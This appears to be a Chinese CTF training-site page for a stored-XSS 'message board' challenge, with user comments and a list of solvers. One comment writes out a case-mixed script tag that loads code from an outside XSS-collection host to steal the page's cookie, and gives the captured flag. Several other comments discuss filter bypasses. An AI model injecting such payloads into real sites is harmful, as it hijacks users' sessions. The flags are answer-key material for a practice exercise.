留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一  血: ꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励: 5金币
解  决: 2961
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
...
登录回复
评论
admin999 2年前
举报

XSS插进图片了,不过好像收不到flag啊?

回复 0
sshui 2年前
举报

@admin999 找后台

回复 0
admin999 2年前
举报

@sshui 所以这题现在怎么做...

回复 0
sshui 2年前
举报

改题了

回复 0
anguilin 2年前
举报

沙比题

回复 5
Striker123456 2年前
举报

尖括号字体实体,双引号转义,src自动加上http://。这怎么做?

回复 0
b1lld 2年前
举报

我说你们这些网站出题人是在干嘛啊?新手题官方wp写的那么简短,能缩写就整缩写,突出的就是一个边看文章边查才能体现你的深度是吧?一道入门题硬是要查几篇博客一顿查是吧?一道题本来好不容易搜到几篇wp能看的,咔咔一顿操作,做到一半发现原来的做题思路行不通了,哦,看下评论,题目改了。我说你们是在干嘛啊????新手题诶???建这个网站的目的不是让人学习吗??不是为了让人入门吗???不是为了让人按照一个思路去

回复 15
anguilin 2年前
举报

咋做

回复 0
skiller 2年前
举报

db.sql是怎么搜出来的?我用dir没搜出来啊?

回复 9
BugKugirl 2年前
举报

在线XSS平台(https://xss.pt/)生成xss代码(<sCRiPt sRC=//0x.ax/AUBv></sCrIpT>)放到留言板,xss平台直接获得cookie : flag=flag%7Bf7784e4107be555d08be73ac01569c6f%7D,将flag进行url解码(http://www.jsons.cn/urlencode)

回复 0
1317554973 2年前
举报

拿到xss得flag填进去但不对

回复 0
17695688750 2年前
举报

奥原来%7b和%7d是{}的asc码,我憨批了

回复 0
17695688750 2年前
举报

我插入了图片xss,平台给我回显了这个flag=flag%7B34211b64224e890f37244b7b065fc409%7D,有人知道怎么转译成正确的flag么

回复 0
zhaiwb 2年前
举报

%7b换成{}

回复 0
13509329442 2年前
举报

url解码

回复 0
泡椒控卫 2年前
举报

https://blog.csdn.net/m0_57954651/article/details/127621060

回复 0

WriteUp

image
丶我亚索贼六

5 金币

立即查看

评分(17)

解题动态

a1451753998 攻破了该题 2天前
3320981239 攻破了该题 3天前
zengzhijing 攻破了该题 5天前
没有绝对的安全系统 攻破了该题 6天前
DigitalLemon 攻破了该题 10天前
不吃鸭蛋 攻破了该题 10天前
flagshiwodie 攻破了该题 10天前
ww__ 攻破了该题 11天前
huihuiwudi 攻破了该题 12天前
huihuiwudi321 攻破了该题 12天前
hackerbugku 攻破了该题 13天前
李欣 攻破了该题 14天前
网络安全亮 攻破了该题 17天前
西红柿炒番茄 攻破了该题 17天前
yiwuxiaobawang 攻破了该题 17天前
xiayuan 攻破了该题 18天前
xky110 攻破了该题 18天前
dengsf2025 攻破了该题 19天前
huaxinxin 攻破了该题 19天前
cs888 攻破了该题 20天前
问题反馈